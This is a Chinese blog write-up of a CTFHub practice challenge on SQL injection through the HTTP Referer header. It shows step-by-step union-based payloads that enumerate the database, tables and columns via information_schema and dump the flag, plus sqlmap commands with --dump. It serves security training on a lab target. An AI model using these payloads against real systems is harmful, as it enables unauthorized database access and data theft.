CTFHUB-技能树-Web题-SQL注入-Mysql结构-Refer注入

原创 已于 2024-05-09 21:13:46 修改 · 1.5k 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #mysql #数据库

于 2024-04-09 21:52:17 首次发布
本文介绍了Refer注入攻击方法,包括如何利用HTTP_REFERER头进行手工注入,通过抓包获取Refer参数,判断注入点、字段数以及回显,使用sqlmap工具进行数据库、表名和列名的爆破,展示了从基础原理到实战操作的过程。

技能树-Web题-SQL注入-Mysql结构-Refer注入

文章目录

Mysql结构—Refer注入
手工注入

根据提示,用bp抓包

HTTP_REFERER简介

HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。

也就是说,只有当你向浏览器发送请求时,才会带上referer

如果一开始就抓包不发送请求是的得不到referer的,如下图:

在这里插入图片描述

所以向浏览器发送一个post请求:

在这里插入图片描述

发送完后在进行抓包就可以找referer:

在这里插入图片描述

找到后对referer进行传参

然后,正常进行sql注入。

判断注入点
1 and 1=1 有回显

在这里插入图片描述

1 and 1=2 无回显

在这里插入图片描述

说明此处存在注入点

判断字段数
1 order by 3 无回显

在这里插入图片描述

1 order by 2 有回显

在这里插入图片描述

说明字段数为2

判断回显字段数
-1 union select 1,2

在这里插入图片描述

1,2都显示,有两个回显字段

爆库名
-1 union select user(),database()

在这里插入图片描述

得到库名sqli

爆表名

-1 union select user(),group_concat(table_name) from information_schema.tables where table_schema = 'sqli'

在这里插入图片描述

得到两个表名,第一张表看名字像是自定义的表,尝试爆破第一张表

爆列名
-1 union select user(),group_concat(column_name) from information_schema.columns where table_name = 'opneocsiil'

在这里插入图片描述

得到列名

爆数据
-1 union select user(),xpqkutgmfe from sqli.opneocsiil

在这里插入图片描述

sqlmap

refer注入 ,level 需要大于3

-p 指定参数,这里为 -p “id”

用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破(根据reger注入level需要大于三)

(windows python sqlmap.py )

爆库
sqlmap -r “xxxxx.txt” -p referer --level 5 --dbs

爆表
sqlmap -r “xxxxx.txt” -p referer --level 5 -D sqli --tables

直接导出表中数据
sqlmap -r “xxxxx.txt” -p referer --level 5 -D sqli -T asdnfa --columns --dump
CTFhub Refer注入
plant1234的博客
06-18 1539
Refer注入: 这道首先我自己一开始也有点乱,找不到referer在哪里 但根据大佬的博客:https://blog.youkuaiyun.com/qq_37450949/article/details/117003065 提示的话知道,referer的一些知识: HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 这句话的意思就是,只有当你向浏
解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2649
数据库注入
CTFHUB技能树SQL——Refer注入
weixin_73049307的博客
10-18 1118
看样子可能不在数据库中,老样子,改成-1 union select 1,2#但是出错了,换成kali的sqlmap试了试也还是不行,不知道什么原因。得知vjrnfqmoar表和news表。回显错误,说明是整数型注入。得知pnzslmlazg列。直接挑明是Refer注入。回显错误,说明字段数是2。得知数据库名是sqli。
CTFHub SQL注入通关笔记6:MySQL结构(手注法+脚本法)
最新发布
mooyuan的网络安全博客
10-08 833
本文通过两种方法(手注法+脚本法)对“CTFHub平台 SQL注入-MySQL结构”关卡进行渗透实战。首先介绍了MySQL系统数据库(information_schema、mysql、performance_schema)在注入攻击中的关键作用,以及常用内置函数(database()、version()等)。然后分步骤演示了手工注入方法:从识别注入点、确定列数、定位回显位,到获取数据库名、表名和字段名,最终提取目标数据。文章同样使用sqlmap工具自动化完成注入的完整流程,系统讲解参数的设置并对结果进行分。
CTFHub | Refer注入
尼泊罗河伯的博客
11-26 2412
根据目显示内容,此和上一一致,需要在 Refer 请求头中进行 SQL 注入。那么直接使用 burp suite 抓包工具抓取目网站的信息,并将抓取到的数据发送给重放器。在 Refer请求中使用 payload 进行测试,发现此存在 Refer注入。那么直接根据注入流程进行注入,最后发现此 flag 存在于 ncdiyxjtck 数据中。
CTFHUB-Cookie注入
Web学习之路
03-28 307
cookie啊
CTFHub - Refer注入
Have_a_great_day的博客
09-12 1220
table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1064
CTFHUB SQL
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7974
Web 目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 1036
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
ctfhub技能树 web sql注入
m0_62207170的博客
04-16 553
ctfhub技能树 web sql注入
CTFHUB-SQL注入-MySQL结构
u014794539的博客
07-10 551
考点 MySQL数据库结构 数据库1 = 网站1 表明 列名 数据 数据库2 … 数据库3 … 分析过程 ?id=1 and 1=1 ?id=1 and 1=2 ?id=1' and1=1# 上句执行了下两句未执行 存在注入 查字段 1 order by 1 1 order by 2 1 order by 3 2执行 3不执行了 两个字段 查看当前数据库 233 union select 1,database() 库名还是sqli,看表 233 union select 1,grou
[CTFhub]CTFhub技能树SQL注入——Refer注入
KKleeeaa的博客
04-05 716
提示:本文章仅限学习参考,切勿用于非法用途。
ctfhub Refer注入
weixin_43326436的博客
06-10 1007
1,实验环境 ctfhubsql注入 2.工具 火狐浏览器,火狐浏览器插件hackbar(可以安装,百度。。。) 直接抓包,但是会看到没有我们想要的refer这个字样,我们在hackerbar里面输出需要的参数,id=1,提交时抓包,抓到我们所需要的字样。 3.在bp中refer字段这里进行爆库,输入123 union select (database()),2 # 后点击forward放包步骤接下来一样) 显示出了数据库sqli 继续爆表 123 union select (select group_c
CTFHub-referer注入
m0_51589948的博客
05-19 986
referer注入 根据提示寻找referer,对其进行bp抓包,并发包到repeater 对referer进行注入判断 -1 union select 1,2 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag -1 union select database(),1 查库名 然后查询数据库的表名 -1 union select 1,group select(table_name) feom information_schema.table where table_sche
CTFHub-web(MySQL结构)
分享与记录
08-21 3108
1. 输入一个1,发现有两个注入点 2. 验证这两个注入点 0 union select 1,2 3. 从注入点得到数据库信息和数据库版本 0 union select database(),version() 4. 查询sqli数据库中的表 0 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' 5. 查询表中的字段 0 union select
CTFHub | MySQL结构
尼泊罗河伯的博客
11-13 2332
根据网页显示内容输入1进行测试,此可能存在 SQL 注入。此与前一类似,这次使用手工注入。先判断是否存在注入,发现存在注入后检查注入点。判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看全部数据库名,并查看这些数据库的表名,最后在lvlbiqemvj 表中的数据发现此 flag 。
CTFHub-referer注入-wp
z1moq的博客
05-18 365
referer注入 注入点如图 测试出能够注入后使用字符型注入语法即可 sqlmap做法同UA注入 HTTP_REFERER简介 HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 ...
CTFHub技能树web(持续更新)--SQL注入--Refer注入
jiuyongpinyin的博客
09-06 634
Refer注入 首先根据目提示,实在referer处输入id,那么我们先抓包: 那么我们在发送包的时候携带上这个参数: 这里有回显了,接下来的事情就好办了,先通过order by语句查询几列,发现两列的时候回显正常,接着我们使用联合查询: 这里注入成功了,我们爆破当前数据库: 得到数据库,爆破数据库里面的表名: 得到了奇怪的表名,查看这个表名里面的列: 得到列名,之后爆破里面的字段: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
轻松快速进行ClojureScript测试的boot-cljs-test启动指南
ClojureScript 设计用于高效、可移植地生成高度优化的 JavaScript 代码,保持了 Clojure 的功能,比如不可变数据结构、函数式编程范式、宏以及强大的并发模型。它主要用于前端开发,并且提供了与 JavaScript 的互...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值